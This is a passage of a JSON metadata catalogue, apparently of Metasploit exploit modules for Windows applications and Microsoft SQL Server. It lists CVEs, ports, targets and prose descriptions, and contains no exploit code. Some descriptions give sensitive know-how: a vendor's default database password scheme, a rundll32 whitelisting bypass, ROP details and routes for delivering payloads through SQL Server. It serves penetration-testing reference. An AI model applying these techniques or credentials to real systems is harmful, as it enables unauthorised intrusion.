"rport": 2000,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"ShixxNOTE 6.net Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/misc/shixxnote_font.rb",
"is_install_path": true,
"ref_name": "windows/misc/shixxnote_font",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/solidworks_workgroup_pdmwservice_file_write": {
"name": "SolidWorks Workgroup PDM 2014 pdmwService.exe Arbitrary File Write",
"full_name": "exploit/windows/misc/solidworks_workgroup_pdmwservice_file_write",
"rank": 400,
"disclosure_date": "2014-02-22",
"type": "exploit",
"author": [
"Mohamed Shetta <mshetta@live.com>",
"bcoles <bcoles@gmail.com>"
],
"description": "This module exploits a remote arbitrary file write vulnerability in\n SolidWorks Workgroup PDM 2014 SP2 and prior.\n\n For targets running Windows Vista or newer the payload is written to the\n startup folder for all users and executed upon next user logon.\n\n For targets before Windows Vista code execution can be achieved by first\n uploading the payload as an exe file, and then upload another mof file,\n which schedules WMI to execute the uploaded payload.\n\n This module has been tested successfully on SolidWorks Workgroup PDM\n 2011 SP0 on Windows XP SP3 (EN) and Windows 7 SP1 (EN).",
"references": [
"CVE-2014-100015",
"EDB-31831",
"OSVDB-103671"
],
"platform": "Windows",
"arch": "",
"rport": 30000,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"SolidWorks Workgroup PDM <= 2014 SP2 (Windows XP SP0-SP3)",
"SolidWorks Workgroup PDM <= 2014 SP2 (Windows Vista onwards)"
],
"mod_time": "2019-01-10 19:19:14 +0000",
"path": "/modules/exploits/windows/misc/solidworks_workgroup_pdmwservice_file_write.rb",
"is_install_path": true,
"ref_name": "windows/misc/solidworks_workgroup_pdmwservice_file_write",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/splayer_content_type": {
"name": "SPlayer 3.7 Content-Type Buffer Overflow",
"full_name": "exploit/windows/misc/splayer_content_type",
"rank": 300,
"disclosure_date": "2011-05-04",
"type": "exploit",
"author": [
"xsploitedsec <xsploitedsecurity@gmail.com>",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a vulnerability in SPlayer v3.7 or prior. When SPlayer\n requests the URL of a media file (video or audio), it is possible to gain arbitrary\n remote code execution due to a buffer overflow caused by an exceeding length of data\n as the 'Content-Type' parameter.",
"references": [
"OSVDB-72181",
"EDB-17243"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP2/XP3"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/misc/splayer_content_type.rb",
"is_install_path": true,
"ref_name": "windows/misc/splayer_content_type",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/stream_down_bof": {
"name": "CoCSoft StreamDown 6.8.0 Buffer Overflow",
"full_name": "exploit/windows/misc/stream_down_bof",
"rank": 400,
"disclosure_date": "2011-12-27",
"type": "exploit",
"author": [
"Fady Mohamed Osman <fady.mohamed.osman@gmail.com>"
],
"description": "Stream Down 6.8.0 seh based buffer overflow triggered when processing\n the server response packet. During the overflow a structured exception\n handler is overwritten.",
"references": [
"CVE-2011-5052",
"OSVDB-78043",
"BID-51190",
"URL-http://www.dark-masters.tk/",
"URL-http://secunia.com/advisories/47343/",
"EDB-18283"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"StreamDown 6.8.0"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/misc/stream_down_bof.rb",
"is_install_path": true,
"ref_name": "windows/misc/stream_down_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/talkative_response": {
"name": "Talkative IRC v0.4.4.16 Response Buffer Overflow",
"full_name": "exploit/windows/misc/talkative_response",
"rank": 300,
"disclosure_date": "2009-03-17",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in Talkative IRC v0.4.4.16.\n When a specially crafted response string is sent to a client,\n an attacker may be able to execute arbitrary code.",
"references": [
"OSVDB-64582",
"BID-34141",
"EDB-8227"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP3 English"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/misc/talkative_response.rb",
"is_install_path": true,
"ref_name": "windows/misc/talkative_response",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/tiny_identd_overflow": {
"name": "TinyIdentD 2.2 Stack Buffer Overflow",
"full_name": "exploit/windows/misc/tiny_identd_overflow",
"rank": 200,
"disclosure_date": "2007-05-14",
"type": "exploit",
"author": [
"Jacopo Cervini <acaro@jervus.it>"
],
"description": "This module exploits a stack based buffer overflow in TinyIdentD version 2.2.\n If we send a long string to the ident service we can overwrite the return\n address and execute arbitrary code. Credit to Maarten Boone.",
"references": [
"CVE-2007-2711",
"OSVDB-36053",
"BID-23981"
],
"platform": "Windows",
"arch": "",
"rport": 113,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"Windows 2000 Server SP4 English",
"Windows XP SP2 Italian"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/misc/tiny_identd_overflow.rb",
"is_install_path": true,
"ref_name": "windows/misc/tiny_identd_overflow",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/trendmicro_cmdprocessor_addtask": {
"name": "TrendMicro Control Manger CmdProcessor.exe Stack Buffer Overflow",
"full_name": "exploit/windows/misc/trendmicro_cmdprocessor_addtask",
"rank": 400,
"disclosure_date": "2011-12-07",
"type": "exploit",
"author": [
"Luigi Auriemma",
"Blue"
],
"description": "This module exploits a vulnerability in the CmdProcessor.exe component of Trend\n Micro Control Manger up to version 5.5.\n\n The specific flaw exists within CmdProcessor.exe service running on TCP port\n 20101. The vulnerable function is the CGenericScheduler::AddTask function of\n cmdHandlerRedAlertController.dll. When processing a specially crafted IPC packet,\n controlled data is copied into a 256-byte stack buffer. This can be exploited\n to execute remote code under the context of the user.",
"references": [
"CVE-2011-5001",
"OSVDB-77585",
"ZDI-11-345"
],
"platform": "Windows",
"arch": "",
"rport": 20101,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows 2003 Server SP2 (DEP Bypass)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/misc/trendmicro_cmdprocessor_addtask.rb",
"is_install_path": true,
"ref_name": "windows/misc/trendmicro_cmdprocessor_addtask",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/ufo_ai": {
"name": "UFO: Alien Invasion IRC Client Buffer Overflow",
"full_name": "exploit/windows/misc/ufo_ai",
"rank": 200,
"disclosure_date": "2009-10-28",
"type": "exploit",
"author": [
"Jason Geffner",
"dookie"
],
"description": "This module exploits a buffer overflow in the IRC client component of\n UFO: Alien Invasion 2.2.1.",
"references": [
"OSVDB-65689",
"EDB-14013"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/misc/ufo_ai.rb",
"is_install_path": true,
"ref_name": "windows/misc/ufo_ai",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/vmhgfs_webdav_dll_sideload": {
"name": "DLL Side Loading Vulnerability in VMware Host Guest Client Redirector",
"full_name": "exploit/windows/misc/vmhgfs_webdav_dll_sideload",
"rank": 300,
"disclosure_date": "2016-08-05",
"type": "exploit",
"author": [
"Yorick Koster"
],
"description": "A DLL side loading vulnerability was found in the VMware Host Guest Client Redirector,\n a component of VMware Tools. This issue can be exploited by luring a victim into\n opening a document from the attacker's share. An attacker can exploit this issue to\n execute arbitrary code with the privileges of the target user. This can potentially\n result in the attacker taking complete control of the affected system. If the WebDAV\n Mini-Redirector is enabled, it is possible to exploit this issue over the internet.",
"references": [
"CVE-2016-5330",
"URL-https://securify.nl/advisory/SFY20151201/dll_side_loading_vulnerability_in_vmware_host_guest_client_redirector.html",
"URL-http://www.vmware.com/in/security/advisories/VMSA-2016-0010.html"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows x64",
"Windows x86"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/misc/vmhgfs_webdav_dll_sideload.rb",
"is_install_path": true,
"ref_name": "windows/misc/vmhgfs_webdav_dll_sideload",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/webdav_delivery": {
"name": "Serve DLL via webdav server",
"full_name": "exploit/windows/misc/webdav_delivery",
"rank": 0,
"disclosure_date": "1999-01-01",
"type": "exploit",
"author": [
"Ryan Hanson <ryan.hanson@optiv.com>",
"James Cook <james.cook@optiv.com>"
],
"description": "This module simplifies the rundll32.exe Application Whitelisting Bypass technique.\n The module creates a webdav server that hosts a dll file. When the user types the provided rundll32\n command on a system, rundll32 will load the dll remotly and execute the provided export function.\n The export function needs to be valid, but the default meterpreter function can be anything.\n The process does write the dll to C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\TfsStore\\Tfs_DAV\n but does not load the dll from that location. This file should be removed after execution.\n The extension can be anything you'd like, but you don't have to use one. Two files will be\n written to disk. One named the requested name and one with a dll extension attached.",
"references": [
],
"platform": "Windows",
"arch": "x86, x64",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2018-12-12 13:26:46 +0000",
"path": "/modules/exploits/windows/misc/webdav_delivery.rb",
"is_install_path": true,
"ref_name": "windows/misc/webdav_delivery",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/windows_rsh": {
"name": "Windows RSH Daemon Buffer Overflow",
"full_name": "exploit/windows/misc/windows_rsh",
"rank": 200,
"disclosure_date": "2007-07-24",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a vulnerability in Windows RSH daemon 1.8.\n The vulnerability is due to a failure to check for the length of input sent\n to the RSH server. A CPORT of 512 -> 1023 must be configured for the exploit\n to be successful.",
"references": [
"CVE-2007-4006",
"OSVDB-38572",
"BID-25044"
],
"platform": "Windows",
"arch": "",
"rport": 514,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows 2003 SP1 English",
"Windows XP Pro SP2 English",
"Windows 2000 Pro SP4 English"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/misc/windows_rsh.rb",
"is_install_path": true,
"ref_name": "windows/misc/windows_rsh",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/wireshark_lua": {
"name": "Wireshark console.lua Pre-Loading Script Execution",
"full_name": "exploit/windows/misc/wireshark_lua",
"rank": 600,
"disclosure_date": "2011-07-18",
"type": "exploit",
"author": [
"Haifei Li",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a vulnerability in Wireshark 1.6 or less. When opening a\n pcap file, Wireshark will actually check if there's a 'console.lua' file in the same\n directory, and then parse/execute the script if found. Versions affected by this\n vulnerability: 1.6.0 to 1.6.1, 1.4.0 to 1.4.8",
"references": [
"CVE-2011-3360",
"OSVDB-75347",
"URL-https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=6136",
"URL-http://technet.microsoft.com/en-us/security/msvr/msvr11-014"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Wireshark 1.6.1 or less"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/misc/wireshark_lua.rb",
"is_install_path": true,
"ref_name": "windows/misc/wireshark_lua",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/wireshark_packet_dect": {
"name": "Wireshark packet-dect.c Stack Buffer Overflow",
"full_name": "exploit/windows/misc/wireshark_packet_dect",
"rank": 400,
"disclosure_date": "2011-04-18",
"type": "exploit",
"author": [
"Paul Makowski",
"sickness",
"corelanc0d3r <peter.ve@corelan.be>"
],
"description": "This module exploits a stack buffer overflow in Wireshark <= 1.4.4\n by sending a malicious packet.",
"references": [
"CVE-2011-1591",
"OSVDB-71848",
"URL-https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=5838",
"URL-https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=5836",
"EDB-17185"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Win32 Universal (Generic DEP & ASLR Bypass)"
],
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/exploits/windows/misc/wireshark_packet_dect.rb",
"is_install_path": true,
"ref_name": "windows/misc/wireshark_packet_dect",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/mmsp/ms10_025_wmss_connect_funnel": {
"name": "Windows Media Services ConnectFunnel Stack Buffer Overflow",
"full_name": "exploit/windows/mmsp/ms10_025_wmss_connect_funnel",
"rank": 500,
"disclosure_date": "2010-04-13",
"type": "exploit",
"author": [
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in the Windows Media\n Unicast Service version 4.1.0.3930 (NUMS.exe). By sending a specially\n crafted FunnelConnect request, an attacker can execute arbitrary code\n under the \"NetShowServices\" user account. Windows Media Services 4.1 ships\n with Windows 2000 Server, but is not installed by default.\n\n NOTE: This service does NOT restart automatically. Successful, as well as\n unsuccessful exploitation attempts will kill the service which prevents\n additional attempts.",
"references": [
"CVE-2010-0478",
"OSVDB-63726",
"MSB-MS10-025",
"URL-https://www.lexsi.com/abonnes/labs/adviso-cve-2010-0478.txt"
],
"platform": "Windows",
"arch": "",
"rport": 1755,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows 2000 Pro SP4 English"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/mmsp/ms10_025_wmss_connect_funnel.rb",
"is_install_path": true,
"ref_name": "windows/mmsp/ms10_025_wmss_connect_funnel",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/motorola/timbuktu_fileupload": {
"name": "Timbuktu Pro Directory Traversal/File Upload",
"full_name": "exploit/windows/motorola/timbuktu_fileupload",
"rank": 600,
"disclosure_date": "2008-05-10",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a directory traversal vulnerability in Motorola's\n Timbuktu Pro for Windows 8.6.5.",
"references": [
"CVE-2008-1117",
"OSVDB-43544"
],
"platform": "Windows",
"arch": "",
"rport": 407,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/motorola/timbuktu_fileupload.rb",
"is_install_path": true,
"ref_name": "windows/motorola/timbuktu_fileupload",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/mssql/lyris_listmanager_weak_pass": {
"name": "Lyris ListManager MSDE Weak sa Password",
"full_name": "exploit/windows/mssql/lyris_listmanager_weak_pass",
"rank": 600,
"disclosure_date": "2005-12-08",
"type": "exploit",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module exploits a weak password vulnerability in the\n Lyris ListManager MSDE install. During installation, the 'sa'\n account password is set to 'lminstall'. Once the install\n completes, it is set to 'lyris' followed by the process\n ID of the installer. This module brute forces all possible\n process IDs that would be used by the installer.",
"references": [
"CVE-2005-4145",
"OSVDB-21559"
],
"platform": "Windows",
"arch": "",
"rport": 1433,
"autofilter_ports": [
1433,
1434,
1435,
14330,
2533,
9152,
2638
],
"autofilter_services": [
"ms-sql-s",
"ms-sql2000",
"sybase"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/mssql/lyris_listmanager_weak_pass.rb",
"is_install_path": true,
"ref_name": "windows/mssql/lyris_listmanager_weak_pass",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/mssql/ms02_039_slammer": {
"name": "MS02-039 Microsoft SQL Server Resolution Overflow",
"full_name": "exploit/windows/mssql/ms02_039_slammer",
"rank": 400,
"disclosure_date": "2002-07-24",
"type": "exploit",
"author": [
"hdm <x@hdm.io>"
],
"description": "This is an exploit for the SQL Server 2000 resolution\n service buffer overflow. This overflow is triggered by\n sending a udp packet to port 1434 which starts with 0x04 and\n is followed by long string terminating with a colon and a\n number. This module should work against any vulnerable SQL\n Server 2000 or MSDE install (pre-SP3).",
"references": [
"CVE-2002-0649",
"OSVDB-4578",
"BID-5310",
"MSB-MS02-039"
],
"platform": "Windows",
"arch": "",
"rport": 1434,
"autofilter_ports": [
1433,
1434,
1435,
14330,
2533,
9152,
2638
],
"autofilter_services": [
"ms-sql-s",
"ms-sql2000",
"sybase"
],
"targets": [
"MSSQL 2000 / MSDE <= SP2"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/mssql/ms02_039_slammer.rb",
"is_install_path": true,
"ref_name": "windows/mssql/ms02_039_slammer",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/mssql/ms02_056_hello": {
"name": "MS02-056 Microsoft SQL Server Hello Overflow",
"full_name": "exploit/windows/mssql/ms02_056_hello",
"rank": 400,
"disclosure_date": "2002-08-05",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "By sending malformed data to TCP port 1433, an\n unauthenticated remote attacker could overflow a buffer and\n possibly execute code on the server with SYSTEM level\n privileges. This module should work against any vulnerable\n SQL Server 2000 or MSDE install (< SP3).",
"references": [
"CVE-2002-1123",
"OSVDB-10132",
"BID-5411",
"MSB-MS02-056"
],
"platform": "Windows",
"arch": "",
"rport": 1433,
"autofilter_ports": [
1433,
1434,
1435,
14330,
2533,
9152,
2638
],
"autofilter_services": [
"ms-sql-s",
"ms-sql2000",
"sybase"
],
"targets": [
"MSSQL 2000 / MSDE <= SP2"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/mssql/ms02_056_hello.rb",
"is_install_path": true,
"ref_name": "windows/mssql/ms02_056_hello",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/mssql/ms09_004_sp_replwritetovarbin": {
"name": "MS09-004 Microsoft SQL Server sp_replwritetovarbin Memory Corruption",
"full_name": "exploit/windows/mssql/ms09_004_sp_replwritetovarbin",
"rank": 400,
"disclosure_date": "2008-12-09",
"type": "exploit",
"author": [
"jduck <jduck@metasploit.com>"
],
"description": "A heap-based buffer overflow can occur when calling the undocumented\n \"sp_replwritetovarbin\" extended stored procedure. This vulnerability affects\n all versions of Microsoft SQL Server 2000 and 2005, Windows Internal Database,\n and Microsoft Desktop Engine (MSDE) without the updates supplied in MS09-004.\n Microsoft patched this vulnerability in SP3 for 2005 without any public\n mention.\n\n An authenticated database session is required to access the vulnerable code.\n That said, it is possible to access the vulnerable code via an SQL injection\n vulnerability.\n\n This exploit smashes several pointers, as shown below.\n\n 1. pointer to a 32-bit value that is set to 0\n 2. pointer to a 32-bit value that is set to a length influenced by the buffer\n length.\n 3. pointer to a 32-bit value that is used as a vtable pointer. In MSSQL 2000,\n this value is referenced with a displacement of 0x38. For MSSQL 2005, the\n displacement is 0x10. The address of our buffer is conveniently stored in\n ecx when this instruction is executed.\n 4. On MSSQL 2005, an additional vtable ptr is smashed, which is referenced with\n a displacement of 4. This pointer is not used by this exploit.\n\n This particular exploit replaces the previous dual-method exploit. It uses\n a technique where the value contained in ecx becomes the stack. From there,\n return oriented programming is used to normalize the execution state and\n finally execute the payload via a \"jmp esp\". All addresses used were found\n within the sqlservr.exe memory space, yielding very reliable code execution\n using only a single query.\n\n NOTE: The MSSQL server service does not automatically restart by default. That\n said, some exceptions are caught and will not result in terminating the process.\n If the exploit crashes the service prior to hijacking the stack, it won't die.\n Otherwise, it's a goner.",
"references": [
"OSVDB-50589",
"CVE-2008-5416",
"BID-32710",
"MSB-MS09-004",
"EDB-7501"
],
"platform": "Windows",
"arch": "",
"rport": 1433,
"autofilter_ports": [
1433,
1434,
1435,
14330,
2533,
9152,
2638
],
"autofilter_services": [
"ms-sql-s",
"ms-sql2000",
"sybase"
],
"targets": [
"Automatic",
"MSSQL 2000 / MSDE SP0 (8.00.194)",
"MSSQL 2000 / MSDE SP1 (8.00.384)",
"MSSQL 2000 / MSDE SP2 (8.00.534)",
"MSSQL 2000 / MSDE SP3 (8.00.760)",
"MSSQL 2000 / MSDE SP4 (8.00.2039)",
"MSSQL 2005 SP0 (9.00.1399.06)",
"MSSQL 2005 SP1 (9.00.2047.00)",
"MSSQL 2005 SP2 (9.00.3042.00)",
"CRASHER"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin.rb",
"is_install_path": true,
"ref_name": "windows/mssql/ms09_004_sp_replwritetovarbin",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/mssql/ms09_004_sp_replwritetovarbin_sqli": {
"name": "MS09-004 Microsoft SQL Server sp_replwritetovarbin Memory Corruption via SQL Injection",
"full_name": "exploit/windows/mssql/ms09_004_sp_replwritetovarbin_sqli",
"rank": 600,
"disclosure_date": "2008-12-09",
"type": "exploit",
"author": [
"jduck <jduck@metasploit.com>",
"Rodrigo Marcos"
],
"description": "A heap-based buffer overflow can occur when calling the undocumented\n \"sp_replwritetovarbin\" extended stored procedure. This vulnerability affects\n all versions of Microsoft SQL Server 2000 and 2005, Windows Internal Database,\n and Microsoft Desktop Engine (MSDE) without the updates supplied in MS09-004.\n Microsoft patched this vulnerability in SP3 for 2005 without any public\n mention.\n\n This exploit smashes several pointers, as shown below.\n\n 1. pointer to a 32-bit value that is set to 0\n 2. pointer to a 32-bit value that is set to a length influenced by the buffer\n length.\n 3. pointer to a 32-bit value that is used as a vtable pointer. In MSSQL 2000,\n this value is referenced with a displacement of 0x38. For MSSQL 2005, the\n displacement is 0x10. The address of our buffer is conveniently stored in\n ecx when this instruction is executed.\n 4. On MSSQL 2005, an additional vtable ptr is smashed, which is referenced with\n a displacement of 4. This pointer is not used by this exploit.\n\n This particular exploit replaces the previous dual-method exploit. It uses\n a technique where the value contained in ecx becomes the stack. From there,\n return oriented programming is used to normalize the execution state and\n finally execute the payload via a \"jmp esp\". All addresses used were found\n within the sqlservr.exe memory space, yielding very reliable code execution\n using only a single query.\n\n NOTE: The MSSQL server service does not automatically restart by default. That\n said, some exceptions are caught and will not result in terminating the process.\n If the exploit crashes the service prior to hijacking the stack, it won't die.\n Otherwise, it's a goner.",
"references": [
"OSVDB-50589",
"CVE-2008-5416",
"BID-32710",
"MSB-MS09-004",
"EDB-7501",
"URL-http://www.secforce.co.uk/blog/2011/01/exploiting-ms09-004-via-sql-injection/"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic",
"MSSQL 2000 / MSDE SP0 (8.00.194)",
"MSSQL 2000 / MSDE SP1 (8.00.384)",
"MSSQL 2000 / MSDE SP2 (8.00.534)",
"MSSQL 2000 / MSDE SP3 (8.00.760)",
"MSSQL 2000 / MSDE SP4 (8.00.2039)",
"MSSQL 2005 SP0 (9.00.1399.06)",
"MSSQL 2005 SP1 (9.00.2047.00)",
"MSSQL 2005 SP2 (9.00.3042.00)",
"CRASHER"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin_sqli.rb",
"is_install_path": true,
"ref_name": "windows/mssql/ms09_004_sp_replwritetovarbin_sqli",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/mssql/mssql_clr_payload": {
"name": "Microsoft SQL Server Clr Stored Procedure Payload Execution",
"full_name": "exploit/windows/mssql/mssql_clr_payload",
"rank": 600,
"disclosure_date": "1999-01-01",
"type": "exploit",
"author": [
"Lee Christensen",
"Nathan Kirk",
"OJ Reeves"
],
"description": "This module executes an arbitrary native payload on a Microsoft SQL\n server by loading a custom SQL CLR Assembly into the target SQL\n installation, and calling it directly with a base64-encoded payload.\n\n The module requires working credentials in order to connect directly to the\n MSSQL Server.\n\n This method requires the user to have sufficient privileges to install a custom\n SQL CRL DLL, and invoke the custom stored procedure that comes with it.\n\n This exploit does not leave any binaries on disk.\n\n Tested on MS SQL Server versions: 2005, 2012, 2016 (all x64).",
"references": [
"URL-http://sekirkity.com/command-execution-in-sql-server-via-fileless-clr-based-custom-stored-procedure/"
],
"platform": "Windows",
"arch": "x86, x64",
"rport": 1433,
"autofilter_ports": [
1433,
1434,
1435,
14330,
2533,
9152,
2638
],
"autofilter_services": [
"ms-sql-s",
"ms-sql2000",
"sybase"
],
"targets": [
"Automatic"
],
"mod_time": "2017-09-10 14:15:39 +0000",
"path": "/modules/exploits/windows/mssql/mssql_clr_payload.rb",
"is_install_path": true,
"ref_name": "windows/mssql/mssql_clr_payload",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/mssql/mssql_linkcrawler": {
"name": "Microsoft SQL Server Database Link Crawling Command Execution",
"full_name": "exploit/windows/mssql/mssql_linkcrawler",
"rank": 500,
"disclosure_date": "2000-01-01",
"type": "exploit",
"author": [
"Antti Rantasaari <antti.rantasaari@netspi.com>",
"Scott Sutherland \"nullbind\" <scott.sutherland@netspi.com>"
],
"description": "This module can be used to crawl MS SQL Server database links and deploy\n Metasploit payloads through links configured with sysadmin privileges using a\n valid SQL Server Login.\n\n If you are attempting to obtain multiple reverse shells using this module we\n recommend setting the \"DisablePayloadHandler\" advanced option to \"true\", and setting\n up a exploit/multi/handler to run in the background as a job to support multiple incoming\n shells.\n\n If you are interested in deploying payloads to specific servers this module also\n supports that functionality via the \"DEPLOYLIST\" option.\n\n Currently, the module is capable of delivering payloads to both 32bit and 64bit\n Windows systems via powershell memory injection methods based on Matthew Graeber's\n work. As a result, the target server must have powershell installed. By default,\n all of the crawl information is saved to a CSV formatted log file and MSF loot so\n that the tool can also be used for auditing without deploying payloads.",
"references": [
"URL-http://www.slideshare.net/nullbind/sql-server-exploitation-escalation-pilfering-appsec-usa-2012",
"URL-http://msdn.microsoft.com/en-us/library/ms188279.aspx",
"URL-http://www.exploit-monday.com/2011_10_16_archive.html"
],
"platform": "Windows",
"arch": "x86, x64",
"rport": 1433,
"autofilter_ports": [
1433,
1434,
1435,
14330,
2533,
9152,
2638
],
"autofilter_services": [
"ms-sql-s",
"ms-sql2000",
"sybase"
],
"targets": [
"Automatic"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/mssql/mssql_linkcrawler.rb",
"is_install_path": true,
"ref_name": "windows/mssql/mssql_linkcrawler",
"check": false,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"exploit_windows/mssql/mssql_payload": {
"name": "Microsoft SQL Server Payload Execution",
"full_name": "exploit/windows/mssql/mssql_payload",
"rank": 600,
"disclosure_date": "2000-05-30",
"type": "exploit",
"author": [
"David Kennedy \"ReL1K\" <kennedyd013@gmail.com>",
"jduck <jduck@metasploit.com>"
],
"description": "This module executes an arbitrary payload on a Microsoft SQL Server by using\n the \"xp_cmdshell\" stored procedure. Currently, three delivery methods are supported.\n\n First, the original method uses Windows 'debug.com'. File size restrictions are\n avoided by incorporating the debug bypass method presented by SecureStat at\n Defcon 17. Since this method invokes ntvdm, it is not available on x64 systems.\n\n A second method takes advantage of the Command Stager subsystem. This allows using\n various techniques, such as using a TFTP server, to send the executable. By default\n the Command Stager uses 'wcsript.exe' to generate the executable on the target.\n\n Finally, ReL1K's latest method utilizes PowerShell to transmit and recreate the\n payload on the target.\n\n NOTE: This module will leave a payload executable on the target system when the\n attack is finished.",
"references": [
"CVE-2000-0402",
"OSVDB-557",
"BID-1281",
"CVE-2000-1209",
"OSVDB-15757",
"BID-4797"
],
"platform": "Windows",
"arch": "x86, x64",
"rport": 1433,
"autofilter_ports": [
1433,
1434,
1435,
14330,
2533,
9152,
2638
],
"autofilter_services": [
"ms-sql-s",
"ms-sql2000",
"sybase"
],
"targets": [
"Automatic"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/mssql/mssql_payload.rb",
"is_install_path": true,
"ref_name": "windows/mssql/mssql_payload",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/mssql/mssql_payload_sqli": {
"name": "Microsoft SQL Server Payload Execution via SQL Injection",
"full_name": "exploit/windows/mssql/mssql_payload_sqli",
"rank": 600,
"disclosure_date": "2000-05-30",
"type": "exploit",
"author": [
"David Kennedy \"ReL1K\" <kennedyd013@gmail.com>",
"jduck <jduck@metasploit.com>",
"Rodrigo Marcos"
],
